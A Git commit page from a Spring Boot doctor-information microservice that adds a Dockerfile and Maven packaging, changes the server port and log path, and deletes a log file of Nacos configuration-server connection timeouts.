医生的个人信息初始化模块

master
Shi Xu Chao 2023-10-29 14:07:24 +08:00
parent ef7882f5bd
commit a7e5a3c24d
12 changed files with 47 additions and 2589 deletions

6
.idea/vcs.xml 100644
View File

@ -0,0 +1,6 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="VcsDirectoryMappings">
<mapping directory="$PROJECT_DIR$" vcs="Git" />
</component>
</project>

21
Dockerfile 100644
View File

@ -0,0 +1,21 @@
FROM anolis-registry.cn-zhangjiakou.cr.aliyuncs.com/openanolis/openjdk:17-8.6
# 暴露端口号
EXPOSE 10086/tcp
# 挂载目录位置
VOLUME /home/logs/grail-patient-doctor
#构造 复制外部文件到docker 内部
COPY /grail-patient-doctor-server/target/grail-patient-doctor-server.jar /home/app.jar
# 工作目录 exec -it 进来就是默认这个目录
WORKDIR /home
# 指定东八区
RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > .etc.timezone
# 启动java程序
CMD ["java","-Dfile.encoding=UTF-8","-jar","/home/app.jar"]

View File

@ -1 +1 @@
# 调用接口相对路径
com.grail.doctor.factory.FactoryDoctorService

View File

@ -9,6 +9,7 @@
<version>3.6.3</version>
</parent>
<version>3.6.3</version>
<artifactId>grail-patient-doctor-server</artifactId>
<properties>
@ -89,4 +90,20 @@
</dependencies>
<build>
<finalName>${project.artifactId}</finalName>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
<executions>
<execution>
<goals>
<goal>repackage</goal>
</goals>
</execution>
</executions>
</plugin>
</plugins>
</build>
</project>

View File

@ -1,6 +1,6 @@
# Tomcat
server:
port: 10009
port: 10086
# Spring
spring:

View File

@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<configuration scan="true" scanPeriod="60 seconds" debug="false">
<!-- 日志存放路径 -->
<property name="log.path" value="./logs/grail/patient/wallet" />
<property name="log.path" value="./logs/grail-patient-doctor" />
<!-- 日志输出格式 -->
<property name="log.pattern" value="%d{HH:mm:ss.SSS} [%thread] %-5level %logger{20} - [%method,%line] - %msg%n" />

File diff suppressed because it is too large Load Diff

View File

@ -1,662 +0,0 @@
13:56:53.899 [main] ERROR c.a.n.c.r.c.g.GrpcClient - [printIfErrorEnabled,99] - Server check fail, please check server 10.100.1.3 ,port 9848 is available , error ={}
java.util.concurrent.TimeoutException: Waited 3000 milliseconds (plus 8 milliseconds, 513600 nanoseconds delay) for com.alibaba.nacos.shaded.io.grpc.stub.ClientCalls$GrpcFuture@31e2232f[status=PENDING, info=[GrpcFuture{clientCall={delegate={delegate=ClientCallImpl{method=MethodDescriptor{fullMethodName=Request/request, type=UNARY, idempotent=false, safe=false, sampledToLocalTracing=true, requestMarshaller=com.alibaba.nacos.shaded.io.grpc.protobuf.lite.ProtoLiteUtils$MessageMarshaller@462e1e64, responseMarshaller=com.alibaba.nacos.shaded.io.grpc.protobuf.lite.ProtoLiteUtils$MessageMarshaller@69afa141, schemaDescriptor=com.alibaba.nacos.api.grpc.auto.RequestGrpc$RequestMethodDescriptorSupplier@49f40c00}}}}}]]
at com.alibaba.nacos.shaded.com.google.common.util.concurrent.AbstractFuture.get(AbstractFuture.java:508)
at com.alibaba.nacos.common.remote.client.grpc.GrpcClient.serverCheck(GrpcClient.java:148)
at com.alibaba.nacos.common.remote.client.grpc.GrpcClient.connectToServer(GrpcClient.java:264)
at com.alibaba.nacos.common.remote.client.RpcClient.start(RpcClient.java:390)
at com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient.ensureRpcClient(ClientWorker.java:885)
at com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient.getOneRunningClient(ClientWorker.java:1044)
at com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient.queryConfig(ClientWorker.java:940)
at com.alibaba.nacos.client.config.impl.ClientWorker.getServerConfig(ClientWorker.java:397)
at com.alibaba.nacos.client.config.NacosConfigService.getConfigInner(NacosConfigService.java:166)
at com.alibaba.nacos.client.config.NacosConfigService.getConfig(NacosConfigService.java:94)
at com.alibaba.cloud.nacos.client.NacosPropertySourceBuilder.loadNacosData(NacosPropertySourceBuilder.java:85)
at com.alibaba.cloud.nacos.client.NacosPropertySourceBuilder.build(NacosPropertySourceBuilder.java:73)
at com.alibaba.cloud.nacos.client.NacosPropertySourceLocator.loadNacosPropertySource(NacosPropertySourceLocator.java:199)
at com.alibaba.cloud.nacos.client.NacosPropertySourceLocator.loadNacosDataIfPresent(NacosPropertySourceLocator.java:186)
at com.alibaba.cloud.nacos.client.NacosPropertySourceLocator.loadNacosConfiguration(NacosPropertySourceLocator.java:158)
at com.alibaba.cloud.nacos.client.NacosPropertySourceLocator.loadSharedConfiguration(NacosPropertySourceLocator.java:116)
at com.alibaba.cloud.nacos.client.NacosPropertySourceLocator.locate(NacosPropertySourceLocator.java:101)
at org.springframework.cloud.bootstrap.config.PropertySourceLocator.locateCollection(PropertySourceLocator.java:51)
at org.springframework.cloud.bootstrap.config.PropertySourceLocator.locateCollection(PropertySourceLocator.java:47)
at org.springframework.cloud.bootstrap.config.PropertySourceBootstrapConfiguration.initialize(PropertySourceBootstrapConfiguration.java:95)
at org.springframework.boot.SpringApplication.applyInitializers(SpringApplication.java:607)
at org.springframework.boot.SpringApplication.prepareContext(SpringApplication.java:373)
at org.springframework.boot.SpringApplication.run(SpringApplication.java:307)
at org.springframework.boot.SpringApplication.run(SpringApplication.java:1306)
at org.springframework.boot.SpringApplication.run(SpringApplication.java:1295)
at com.grail.doctor.DoctorApplication.main(DoctorApplication.java:20)
13:56:56.911 [main] ERROR c.a.n.c.r.c.g.GrpcClient - [printIfErrorEnabled,99] - Server check fail, please check server 10.100.1.3 ,port 9848 is available , error ={}
java.util.concurrent.TimeoutException: Waited 3000 milliseconds (plus 2 milliseconds, 757100 nanoseconds delay) for com.alibaba.nacos.shaded.io.grpc.stub.ClientCalls$GrpcFuture@47b11ec7[status=PENDING, info=[GrpcFuture{clientCall={delegate={delegate=ClientCallImpl{method=MethodDescriptor{fullMethodName=Request/request, type=UNARY, idempotent=false, safe=false, sampledToLocalTracing=true, requestMarshaller=com.alibaba.nacos.shaded.io.grpc.protobuf.lite.ProtoLiteUtils$MessageMarshaller@462e1e64, responseMarshaller=com.alibaba.nacos.shaded.io.grpc.protobuf.lite.ProtoLiteUtils$MessageMarshaller@69afa141, schemaDescriptor=com.alibaba.nacos.api.grpc.auto.RequestGrpc$RequestMethodDescriptorSupplier@49f40c00}}}}}]]
at com.alibaba.nacos.shaded.com.google.common.util.concurrent.AbstractFuture.get(AbstractFuture.java:508)
at com.alibaba.nacos.common.remote.client.grpc.GrpcClient.serverCheck(GrpcClient.java:148)
at com.alibaba.nacos.common.remote.client.grpc.GrpcClient.connectToServer(GrpcClient.java:264)
at com.alibaba.nacos.common.remote.client.RpcClient.start(RpcClient.java:390)
at com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient.ensureRpcClient(ClientWorker.java:885)
at com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient.getOneRunningClient(ClientWorker.java:1044)
at com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient.queryConfig(ClientWorker.java:940)
at com.alibaba.nacos.client.config.impl.ClientWorker.getServerConfig(ClientWorker.java:397)
at com.alibaba.nacos.client.config.NacosConfigService.getConfigInner(NacosConfigService.java:166)
at com.alibaba.nacos.client.config.NacosConfigService.getConfig(NacosConfigService.java:94)
at com.alibaba.cloud.nacos.client.NacosPropertySourceBuilder.loadNacosData(NacosPropertySourceBuilder.java:85)
at com.alibaba.cloud.nacos.client.NacosPropertySourceBuilder.build(NacosPropertySourceBuilder.java:73)
at com.alibaba.cloud.nacos.client.NacosPropertySourceLocator.loadNacosPropertySource(NacosPropertySourceLocator.java:199)
at com.alibaba.cloud.nacos.client.NacosPropertySourceLocator.loadNacosDataIfPresent(NacosPropertySourceLocator.java:186)
at com.alibaba.cloud.nacos.client.NacosPropertySourceLocator.loadNacosConfiguration(NacosPropertySourceLocator.java:158)
at com.alibaba.cloud.nacos.client.NacosPropertySourceLocator.loadSharedConfiguration(NacosPropertySourceLocator.java:116)
at com.alibaba.cloud.nacos.client.NacosPropertySourceLocator.locate(NacosPropertySourceLocator.java:101)
at org.springframework.cloud.bootstrap.config.PropertySourceLocator.locateCollection(PropertySourceLocator.java:51)
at org.springframework.cloud.bootstrap.config.PropertySourceLocator.locateCollection(PropertySourceLocator.java:47)
at org.springframework.cloud.bootstrap.config.PropertySourceBootstrapConfiguration.initialize(PropertySourceBootstrapConfiguration.java:95)
at org.springframework.boot.SpringApplication.applyInitializers(SpringApplication.java:607)
at org.springframework.boot.SpringApplication.prepareContext(SpringApplication.java:373)
at org.springframework.boot.SpringApplication.run(SpringApplication.java:307)
at org.springframework.boot.SpringApplication.run(SpringApplication.java:1306)
at org.springframework.boot.SpringApplication.run(SpringApplication.java:1295)
at com.grail.doctor.DoctorApplication.main(DoctorApplication.java:20)
13:56:59.924 [main] ERROR c.a.n.c.r.c.g.GrpcClient - [printIfErrorEnabled,99] - Server check fail, please check server 10.100.1.3 ,port 9848 is available , error ={}
java.util.concurrent.TimeoutException: Waited 3000 milliseconds (plus 9 milliseconds, 817100 nanoseconds delay) for com.alibaba.nacos.shaded.io.grpc.stub.ClientCalls$GrpcFuture@332bcab0[status=PENDING, info=[GrpcFuture{clientCall={delegate={delegate=ClientCallImpl{method=MethodDescriptor{fullMethodName=Request/request, type=UNARY, idempotent=false, safe=false, sampledToLocalTracing=true, requestMarshaller=com.alibaba.nacos.shaded.io.grpc.protobuf.lite.ProtoLiteUtils$MessageMarshaller@462e1e64, responseMarshaller=com.alibaba.nacos.shaded.io.grpc.protobuf.lite.ProtoLiteUtils$MessageMarshaller@69afa141, schemaDescriptor=com.alibaba.nacos.api.grpc.auto.RequestGrpc$RequestMethodDescriptorSupplier@49f40c00}}}}}]]
at com.alibaba.nacos.shaded.com.google.common.util.concurrent.AbstractFuture.get(AbstractFuture.java:508)
at com.alibaba.nacos.common.remote.client.grpc.GrpcClient.serverCheck(GrpcClient.java:148)
at com.alibaba.nacos.common.remote.client.grpc.GrpcClient.connectToServer(GrpcClient.java:264)
at com.alibaba.nacos.common.remote.client.RpcClient.start(RpcClient.java:390)
at com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient.ensureRpcClient(ClientWorker.java:885)
at com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient.getOneRunningClient(ClientWorker.java:1044)
at com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient.queryConfig(ClientWorker.java:940)
at com.alibaba.nacos.client.config.impl.ClientWorker.getServerConfig(ClientWorker.java:397)
at com.alibaba.nacos.client.config.NacosConfigService.getConfigInner(NacosConfigService.java:166)
at com.alibaba.nacos.client.config.NacosConfigService.getConfig(NacosConfigService.java:94)
at com.alibaba.cloud.nacos.client.NacosPropertySourceBuilder.loadNacosData(NacosPropertySourceBuilder.java:85)
at com.alibaba.cloud.nacos.client.NacosPropertySourceBuilder.build(NacosPropertySourceBuilder.java:73)
at com.alibaba.cloud.nacos.client.NacosPropertySourceLocator.loadNacosPropertySource(NacosPropertySourceLocator.java:199)
at com.alibaba.cloud.nacos.client.NacosPropertySourceLocator.loadNacosDataIfPresent(NacosPropertySourceLocator.java:186)
at com.alibaba.cloud.nacos.client.NacosPropertySourceLocator.loadNacosConfiguration(NacosPropertySourceLocator.java:158)
at com.alibaba.cloud.nacos.client.NacosPropertySourceLocator.loadSharedConfiguration(NacosPropertySourceLocator.java:116)
at com.alibaba.cloud.nacos.client.NacosPropertySourceLocator.locate(NacosPropertySourceLocator.java:101)
at org.springframework.cloud.bootstrap.config.PropertySourceLocator.locateCollection(PropertySourceLocator.java:51)
at org.springframework.cloud.bootstrap.config.PropertySourceLocator.locateCollection(PropertySourceLocator.java:47)
at org.springframework.cloud.bootstrap.config.PropertySourceBootstrapConfiguration.initialize(PropertySourceBootstrapConfiguration.java:95)
at org.springframework.boot.SpringApplication.applyInitializers(SpringApplication.java:607)
at org.springframework.boot.SpringApplication.prepareContext(SpringApplication.java:373)
at org.springframework.boot.SpringApplication.run(SpringApplication.java:307)
at org.springframework.boot.SpringApplication.run(SpringApplication.java:1306)
at org.springframework.boot.SpringApplication.run(SpringApplication.java:1295)
at com.grail.doctor.DoctorApplication.main(DoctorApplication.java:20)
13:57:00.062 [main] ERROR c.a.n.c.r.client - [printIfErrorEnabled,99] - Send request fail, request = ConfigQueryRequest{headers={charset=UTF-8, Client-AppName=unknown, Client-RequestToken=3f60a3115ca566e8a6571040fb05d041, Client-RequestTS=1698472619926, exConfigInfo=true, notify=false, Timestamp=1698472619927}, requestId='null'}, retryTimes = 0, errorMessage = Client not connected, current status:STARTING
13:57:00.170 [main] ERROR c.a.n.c.r.client - [printIfErrorEnabled,99] - Send request fail, request = ConfigQueryRequest{headers={charset=UTF-8, Client-AppName=unknown, Client-RequestToken=3f60a3115ca566e8a6571040fb05d041, Client-RequestTS=1698472619926, exConfigInfo=true, notify=false, Timestamp=1698472619927}, requestId='null'}, retryTimes = 1, errorMessage = Client not connected, current status:STARTING
13:57:00.281 [main] ERROR c.a.n.c.r.client - [printIfErrorEnabled,99] - Send request fail, request = ConfigQueryRequest{headers={charset=UTF-8, Client-AppName=unknown, Client-RequestToken=3f60a3115ca566e8a6571040fb05d041, Client-RequestTS=1698472619926, exConfigInfo=true, notify=false, Timestamp=1698472619927}, requestId='null'}, retryTimes = 2, errorMessage = Client not connected, current status:STARTING
13:57:00.390 [main] ERROR c.a.n.c.r.client - [printIfErrorEnabled,99] - Send request fail, request = ConfigQueryRequest{headers={charset=UTF-8, Client-AppName=unknown, Client-RequestToken=ce95f9026c9e2def00b8cbb9c0821e4e, Client-RequestTS=1698472620285, exConfigInfo=true, notify=false, Timestamp=1698472620285}, requestId='null'}, retryTimes = 0, errorMessage = Client not connected, current status:STARTING
13:57:00.500 [main] ERROR c.a.n.c.r.client - [printIfErrorEnabled,99] - Send request fail, request = ConfigQueryRequest{headers={charset=UTF-8, Client-AppName=unknown, Client-RequestToken=ce95f9026c9e2def00b8cbb9c0821e4e, Client-RequestTS=1698472620285, exConfigInfo=true, notify=false, Timestamp=1698472620285}, requestId='null'}, retryTimes = 1, errorMessage = Client not connected, current status:STARTING
13:57:00.611 [main] ERROR c.a.n.c.r.client - [printIfErrorEnabled,99] - Send request fail, request = ConfigQueryRequest{headers={charset=UTF-8, Client-AppName=unknown, Client-RequestToken=ce95f9026c9e2def00b8cbb9c0821e4e, Client-RequestTS=1698472620285, exConfigInfo=true, notify=false, Timestamp=1698472620285}, requestId='null'}, retryTimes = 2, errorMessage = Client not connected, current status:STARTING
13:57:00.721 [main] ERROR c.a.n.c.r.client - [printIfErrorEnabled,99] - Send request fail, request = ConfigQueryRequest{headers={charset=UTF-8, Client-AppName=unknown, Client-RequestToken=bac23b3a66cd8a63a121596694a58150, Client-RequestTS=1698472620613, exConfigInfo=true, notify=false, Timestamp=1698472620614}, requestId='null'}, retryTimes = 0, errorMessage = Client not connected, current status:STARTING
13:57:00.830 [main] ERROR c.a.n.c.r.client - [printIfErrorEnabled,99] - Send request fail, request = ConfigQueryRequest{headers={charset=UTF-8, Client-AppName=unknown, Client-RequestToken=bac23b3a66cd8a63a121596694a58150, Client-RequestTS=1698472620613, exConfigInfo=true, notify=false, Timestamp=1698472620614}, requestId='null'}, retryTimes = 1, errorMessage = Client not connected, current status:STARTING
13:57:00.941 [main] ERROR c.a.n.c.r.client - [printIfErrorEnabled,99] - Send request fail, request = ConfigQueryRequest{headers={charset=UTF-8, Client-AppName=unknown, Client-RequestToken=bac23b3a66cd8a63a121596694a58150, Client-RequestTS=1698472620613, exConfigInfo=true, notify=false, Timestamp=1698472620614}, requestId='null'}, retryTimes = 2, errorMessage = Client not connected, current status:STARTING
13:57:01.051 [main] ERROR c.a.n.c.r.client - [printIfErrorEnabled,99] - Send request fail, request = ConfigQueryRequest{headers={charset=UTF-8, Client-AppName=unknown, Client-RequestToken=1f012bcbed517f284c07523471aaa286, Client-RequestTS=1698472620942, exConfigInfo=true, notify=false, Timestamp=1698472620942}, requestId='null'}, retryTimes = 0, errorMessage = Client not connected, current status:STARTING
13:57:01.160 [main] ERROR c.a.n.c.r.client - [printIfErrorEnabled,99] - Send request fail, request = ConfigQueryRequest{headers={charset=UTF-8, Client-AppName=unknown, Client-RequestToken=1f012bcbed517f284c07523471aaa286, Client-RequestTS=1698472620942, exConfigInfo=true, notify=false, Timestamp=1698472620942}, requestId='null'}, retryTimes = 1, errorMessage = Client not connected, current status:STARTING
13:57:01.269 [main] ERROR c.a.n.c.r.client - [printIfErrorEnabled,99] - Send request fail, request = ConfigQueryRequest{headers={charset=UTF-8, Client-AppName=unknown, Client-RequestToken=1f012bcbed517f284c07523471aaa286, Client-RequestTS=1698472620942, exConfigInfo=true, notify=false, Timestamp=1698472620942}, requestId='null'}, retryTimes = 2, errorMessage = Client not connected, current status:STARTING
13:57:02.931 [com.alibaba.nacos.client.remote.worker] ERROR c.a.n.c.r.c.g.GrpcClient - [printIfErrorEnabled,99] - Server check fail, please check server 10.100.1.3 ,port 9848 is available , error ={}
java.util.concurrent.TimeoutException: Waited 3000 milliseconds (plus 4 milliseconds, 937000 nanoseconds delay) for com.alibaba.nacos.shaded.io.grpc.stub.ClientCalls$GrpcFuture@fa4b477[status=PENDING, info=[GrpcFuture{clientCall={delegate={delegate=ClientCallImpl{method=MethodDescriptor{fullMethodName=Request/request, type=UNARY, idempotent=false, safe=false, sampledToLocalTracing=true, requestMarshaller=com.alibaba.nacos.shaded.io.grpc.protobuf.lite.ProtoLiteUtils$MessageMarshaller@462e1e64, responseMarshaller=com.alibaba.nacos.shaded.io.grpc.protobuf.lite.ProtoLiteUtils$MessageMarshaller@69afa141, schemaDescriptor=com.alibaba.nacos.api.grpc.auto.RequestGrpc$RequestMethodDescriptorSupplier@49f40c00}}}}}]]
at com.alibaba.nacos.shaded.com.google.common.util.concurrent.AbstractFuture.get(AbstractFuture.java:508)
at com.alibaba.nacos.common.remote.client.grpc.GrpcClient.serverCheck(GrpcClient.java:148)
at com.alibaba.nacos.common.remote.client.grpc.GrpcClient.connectToServer(GrpcClient.java:264)
at com.alibaba.nacos.common.remote.client.RpcClient.reconnect(RpcClient.java:522)
at com.alibaba.nacos.common.remote.client.RpcClient.lambda$start$2(RpcClient.java:370)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:304)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
at java.base/java.lang.Thread.run(Thread.java:833)
13:57:06.045 [com.alibaba.nacos.client.remote.worker] ERROR c.a.n.c.r.c.g.GrpcClient - [printIfErrorEnabled,99] - Server check fail, please check server 10.100.1.3 ,port 9848 is available , error ={}
java.util.concurrent.TimeoutException: Waited 3000 milliseconds for com.alibaba.nacos.shaded.io.grpc.stub.ClientCalls$GrpcFuture@6cc304f8[status=PENDING, info=[GrpcFuture{clientCall={delegate={delegate=ClientCallImpl{method=MethodDescriptor{fullMethodName=Request/request, type=UNARY, idempotent=false, safe=false, sampledToLocalTracing=true, requestMarshaller=com.alibaba.nacos.shaded.io.grpc.protobuf.lite.ProtoLiteUtils$MessageMarshaller@462e1e64, responseMarshaller=com.alibaba.nacos.shaded.io.grpc.protobuf.lite.ProtoLiteUtils$MessageMarshaller@69afa141, schemaDescriptor=com.alibaba.nacos.api.grpc.auto.RequestGrpc$RequestMethodDescriptorSupplier@49f40c00}}}}}]]
at com.alibaba.nacos.shaded.com.google.common.util.concurrent.AbstractFuture.get(AbstractFuture.java:508)
at com.alibaba.nacos.common.remote.client.grpc.GrpcClient.serverCheck(GrpcClient.java:148)
at com.alibaba.nacos.common.remote.client.grpc.GrpcClient.connectToServer(GrpcClient.java:264)
at com.alibaba.nacos.common.remote.client.RpcClient.reconnect(RpcClient.java:522)
at com.alibaba.nacos.common.remote.client.RpcClient.lambda$start$2(RpcClient.java:370)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:304)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
at java.base/java.lang.Thread.run(Thread.java:833)
13:57:09.258 [com.alibaba.nacos.client.remote.worker] ERROR c.a.n.c.r.c.g.GrpcClient - [printIfErrorEnabled,99] - Server check fail, please check server 10.100.1.3 ,port 9848 is available , error ={}
java.util.concurrent.TimeoutException: Waited 3000 milliseconds (plus 8 milliseconds, 536100 nanoseconds delay) for com.alibaba.nacos.shaded.io.grpc.stub.ClientCalls$GrpcFuture@603c9320[status=PENDING, info=[GrpcFuture{clientCall={delegate={delegate=ClientCallImpl{method=MethodDescriptor{fullMethodName=Request/request, type=UNARY, idempotent=false, safe=false, sampledToLocalTracing=true, requestMarshaller=com.alibaba.nacos.shaded.io.grpc.protobuf.lite.ProtoLiteUtils$MessageMarshaller@462e1e64, responseMarshaller=com.alibaba.nacos.shaded.io.grpc.protobuf.lite.ProtoLiteUtils$MessageMarshaller@69afa141, schemaDescriptor=com.alibaba.nacos.api.grpc.auto.RequestGrpc$RequestMethodDescriptorSupplier@49f40c00}}}}}]]
at com.alibaba.nacos.shaded.com.google.common.util.concurrent.AbstractFuture.get(AbstractFuture.java:508)
at com.alibaba.nacos.common.remote.client.grpc.GrpcClient.serverCheck(GrpcClient.java:148)
at com.alibaba.nacos.common.remote.client.grpc.GrpcClient.connectToServer(GrpcClient.java:264)
at com.alibaba.nacos.common.remote.client.RpcClient.reconnect(RpcClient.java:522)
at com.alibaba.nacos.common.remote.client.RpcClient.lambda$start$2(RpcClient.java:370)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:304)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
at java.base/java.lang.Thread.run(Thread.java:833)
13:57:12.589 [com.alibaba.nacos.client.remote.worker] ERROR c.a.n.c.r.c.g.GrpcClient - [printIfErrorEnabled,99] - Server check fail, please check server 10.100.1.3 ,port 9848 is available , error ={}
java.util.concurrent.TimeoutException: Waited 3000 milliseconds (plus 14 milliseconds, 179700 nanoseconds delay) for com.alibaba.nacos.shaded.io.grpc.stub.ClientCalls$GrpcFuture@33cb60db[status=PENDING, info=[GrpcFuture{clientCall={delegate={delegate=ClientCallImpl{method=MethodDescriptor{fullMethodName=Request/request, type=UNARY, idempotent=false, safe=false, sampledToLocalTracing=true, requestMarshaller=com.alibaba.nacos.shaded.io.grpc.protobuf.lite.ProtoLiteUtils$MessageMarshaller@462e1e64, responseMarshaller=com.alibaba.nacos.shaded.io.grpc.protobuf.lite.ProtoLiteUtils$MessageMarshaller@69afa141, schemaDescriptor=com.alibaba.nacos.api.grpc.auto.RequestGrpc$RequestMethodDescriptorSupplier@49f40c00}}}}}]]
at com.alibaba.nacos.shaded.com.google.common.util.concurrent.AbstractFuture.get(AbstractFuture.java:508)
at com.alibaba.nacos.common.remote.client.grpc.GrpcClient.serverCheck(GrpcClient.java:148)
at com.alibaba.nacos.common.remote.client.grpc.GrpcClient.connectToServer(GrpcClient.java:264)
at com.alibaba.nacos.common.remote.client.RpcClient.reconnect(RpcClient.java:522)
at com.alibaba.nacos.common.remote.client.RpcClient.lambda$start$2(RpcClient.java:370)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:304)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
at java.base/java.lang.Thread.run(Thread.java:833)
13:57:16.012 [com.alibaba.nacos.client.remote.worker] ERROR c.a.n.c.r.c.g.GrpcClient - [printIfErrorEnabled,99] - Server check fail, please check server 10.100.1.3 ,port 9848 is available , error ={}
java.util.concurrent.TimeoutException: Waited 3000 milliseconds (plus 14 milliseconds, 243800 nanoseconds delay) for com.alibaba.nacos.shaded.io.grpc.stub.ClientCalls$GrpcFuture@21d41040[status=PENDING, info=[GrpcFuture{clientCall={delegate={delegate=ClientCallImpl{method=MethodDescriptor{fullMethodName=Request/request, type=UNARY, idempotent=false, safe=false, sampledToLocalTracing=true, requestMarshaller=com.alibaba.nacos.shaded.io.grpc.protobuf.lite.ProtoLiteUtils$MessageMarshaller@462e1e64, responseMarshaller=com.alibaba.nacos.shaded.io.grpc.protobuf.lite.ProtoLiteUtils$MessageMarshaller@69afa141, schemaDescriptor=com.alibaba.nacos.api.grpc.auto.RequestGrpc$RequestMethodDescriptorSupplier@49f40c00}}}}}]]
at com.alibaba.nacos.shaded.com.google.common.util.concurrent.AbstractFuture.get(AbstractFuture.java:508)
at com.alibaba.nacos.common.remote.client.grpc.GrpcClient.serverCheck(GrpcClient.java:148)
at com.alibaba.nacos.common.remote.client.grpc.GrpcClient.connectToServer(GrpcClient.java:264)
at com.alibaba.nacos.common.remote.client.RpcClient.reconnect(RpcClient.java:522)
at com.alibaba.nacos.common.remote.client.RpcClient.lambda$start$2(RpcClient.java:370)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:304)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
at java.base/java.lang.Thread.run(Thread.java:833)
13:57:19.520 [com.alibaba.nacos.client.remote.worker] ERROR c.a.n.c.r.c.g.GrpcClient - [printIfErrorEnabled,99] - Server check fail, please check server 10.100.1.3 ,port 9848 is available , error ={}
java.util.concurrent.TimeoutException: Waited 3000 milliseconds (plus 3 milliseconds, 185300 nanoseconds delay) for com.alibaba.nacos.shaded.io.grpc.stub.ClientCalls$GrpcFuture@c2d270e[status=PENDING, info=[GrpcFuture{clientCall={delegate={delegate=ClientCallImpl{method=MethodDescriptor{fullMethodName=Request/request, type=UNARY, idempotent=false, safe=false, sampledToLocalTracing=true, requestMarshaller=com.alibaba.nacos.shaded.io.grpc.protobuf.lite.ProtoLiteUtils$MessageMarshaller@462e1e64, responseMarshaller=com.alibaba.nacos.shaded.io.grpc.protobuf.lite.ProtoLiteUtils$MessageMarshaller@69afa141, schemaDescriptor=com.alibaba.nacos.api.grpc.auto.RequestGrpc$RequestMethodDescriptorSupplier@49f40c00}}}}}]]
at com.alibaba.nacos.shaded.com.google.common.util.concurrent.AbstractFuture.get(AbstractFuture.java:508)
at com.alibaba.nacos.common.remote.client.grpc.GrpcClient.serverCheck(GrpcClient.java:148)
at com.alibaba.nacos.common.remote.client.grpc.GrpcClient.connectToServer(GrpcClient.java:264)
at com.alibaba.nacos.common.remote.client.RpcClient.reconnect(RpcClient.java:522)
at com.alibaba.nacos.common.remote.client.RpcClient.lambda$start$2(RpcClient.java:370)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:304)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
at java.base/java.lang.Thread.run(Thread.java:833)
13:57:23.141 [com.alibaba.nacos.client.remote.worker] ERROR c.a.n.c.r.c.g.GrpcClient - [printIfErrorEnabled,99] - Server check fail, please check server 10.100.1.3 ,port 9848 is available , error ={}
java.util.concurrent.TimeoutException: Waited 3000 milliseconds (plus 6 milliseconds, 815900 nanoseconds delay) for com.alibaba.nacos.shaded.io.grpc.stub.ClientCalls$GrpcFuture@2459831c[status=PENDING, info=[GrpcFuture{clientCall={delegate={delegate=ClientCallImpl{method=MethodDescriptor{fullMethodName=Request/request, type=UNARY, idempotent=false, safe=false, sampledToLocalTracing=true, requestMarshaller=com.alibaba.nacos.shaded.io.grpc.protobuf.lite.ProtoLiteUtils$MessageMarshaller@462e1e64, responseMarshaller=com.alibaba.nacos.shaded.io.grpc.protobuf.lite.ProtoLiteUtils$MessageMarshaller@69afa141, schemaDescriptor=com.alibaba.nacos.api.grpc.auto.RequestGrpc$RequestMethodDescriptorSupplier@49f40c00}}}}}]]
